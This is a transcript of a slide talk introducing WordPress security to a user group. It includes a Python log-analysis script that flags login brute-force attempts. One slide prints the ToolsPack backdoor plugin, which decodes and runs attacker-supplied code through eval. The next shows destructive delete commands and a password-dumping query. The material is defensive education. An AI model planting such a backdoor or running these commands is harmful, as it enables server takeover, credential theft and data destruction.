Intro to Wordpress Security

A brief overview of security concepts to give context to the threats facing Wordpress users.

Published in: Technology

  1. Intro to Wordpress Security. Prepared for the Oklahoma City Wordpress User Group by Chris Dodds.
  2. Chris Dodds, Owner & Principal Advisor at Focusfire IT Strategy & Consulting. Features: ten+ years of experience across multiple industries and IT disciplines. Certifications: CISSP, MCITP:SA, Security+, Network+. System requirements: food, water, & internet connectivity.
  3. This talk is not about the top 5 WP security threats.
  4. Let's talk about Betty.
  5. Betty's Fancy Blog o' Gnomes. (Diagram: Betty's Fancy Server, Betty's Fancy Employer, Betty's Fancy Audience.)
  6. It's not about you, Betty.
  7. The Players: script kiddies, hacktivists, pro criminals, information warriors.
  8. Enumeration → Exploitation → Access.
  9. Password Attacks: exploit weak passwords; dictionary based; can be entirely automated.
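The automation on the attacker's side is visible on the defender's side too. As an added example (not part of the slides, and not the code of any plugin named here), the script below reads Apache-style access-log lines and flags a source that POSTs to wp-login.php repeatedly. It relies on one WordPress behaviour: a failed login re-renders the form with HTTP 200, a successful one redirects with HTTP 302, so a 302 arriving after a burst of 200s from the same IP means a guessed password worked. The log lines are constructed for the demo; the threshold and window are assumed tuning values.

```python
# Added example (not from the slides): spot dictionary attacks on wp-login.php
# in an Apache-style access log. Sample traffic below is constructed.
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache combined log prefix: ip ident user [timestamp] "METHOD path proto" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_login_attacks(lines, threshold=10, window=timedelta(minutes=5)):
    """Flag IPs with >= threshold failed wp-login.php POSTs inside any window.

    Failed login = HTTP 200 (form re-rendered); success = HTTP 302 (redirect
    to wp-admin). A 302 after the burst means the attacker is in.
    threshold/window are assumed tuning values, not WordPress defaults.
    """
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if rec["path"].split("?", 1)[0] != "/wp-login.php":
            continue
        posts[rec["ip"]].append((rec["ts"], rec["status"]))

    flagged = {}
    for ip, events in posts.items():
        events.sort()
        failures = [ts for ts, status in events if status == 200]
        start = 0
        for end in range(len(failures)):          # sliding window over failures
            while failures[end] - failures[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                success_after = any(
                    status in (301, 302) and ts >= failures[end]
                    for ts, status in events
                )
                flagged[ip] = {"failures": len(failures),
                               "success_after_failures": success_after}
                break
    return flagged


def build_sample_log():
    """Constructed sample: one attacker burst plus one legitimate login."""
    base = datetime(2012, 3, 10, 10, 0, 0, tzinfo=timezone(timedelta(hours=-6)))

    def entry(ip, offset, method, path, status):
        ts = (base + timedelta(seconds=offset)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 3400'

    lines = [entry("203.0.113.7", 2 * i, "POST", "/wp-login.php", 200)
             for i in range(12)]                                           # 12 wrong guesses in 22 s
    lines.append(entry("203.0.113.7", 26, "POST", "/wp-login.php", 302))   # the 13th guess works
    lines.append(entry("198.51.100.20", 30, "GET", "/wp-login.php", 200))
    lines.append(entry("198.51.100.20", 40, "POST", "/wp-login.php", 200))  # one typo by a real user
    lines.append(entry("198.51.100.20", 55, "POST", "/wp-login.php", 302))
    lines.append(entry("198.51.100.20", 56, "GET", "/wp-admin/", 200))
    return lines


if __name__ == "__main__":
    for ip, info in find_login_attacks(build_sample_log()).items():
        print(ip, info)
```

Run it against a real access log with `find_login_attacks(open("access.log"))`; the legitimate user with a single typo is never flagged, the attacker is flagged with `success_after_failures` set, which is the case that warrants a password reset and a look for new admin users and plugins, not just a block.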
  10. ToolsPack plugin backdoor (toolspack.php). The plugin header is a decoy; the single statement at the bottom takes attacker-supplied base64 from the `e` request parameter and eval()s it:

        <?php
        /*
        Plugin Name: ToolsPack
        Description: Supercharge your WordPress site with powerful features previously only available to users. core release. Keep the plugin updated!
        Version: 1.2
        Author: Mark Stain
        Author URI:
        */
        $_REQUEST[e] ? EVAL( base64_decode( $_REQUEST[e] ) ) : exit;
        ?>

      Source -
  11. This backdoor code allows the remote user to:
      - Execute commands on your server, e.g. $WINDIR ? `del /F/S/Q $WINDIR*` : `rm -rf /`;
      - Execute commands against your WP database, e.g. SELECT login + - + password FROM users
  12. More likely... Payload: keylogger, trojan, spyware, virus. SEO spam: links and keywords such as "garden gnomes, free chaps, leather sale, cheap sex, porn, prescription drugs, coupons, free avon".
  13. Best Practices: Update! Update! Update! Backup & test your backups. Use a unique passphrase. Don't use the "admin" user. Disable or delete unused plugins.
  14. These are all things your attacker will do once they control your site.
  15. Recommended Plugins. Backup: BackWPup (open-source) or BackupBuddy (commercial). Security: Better WP Security (open-source), Limit Login Attempts (open-source), Sucuri SiteCheck Scanner -
  16. Contact and Q&A. Chris Dodds; e-mail - chris.dodds@focusfire.net; twitter - @doddschris; web -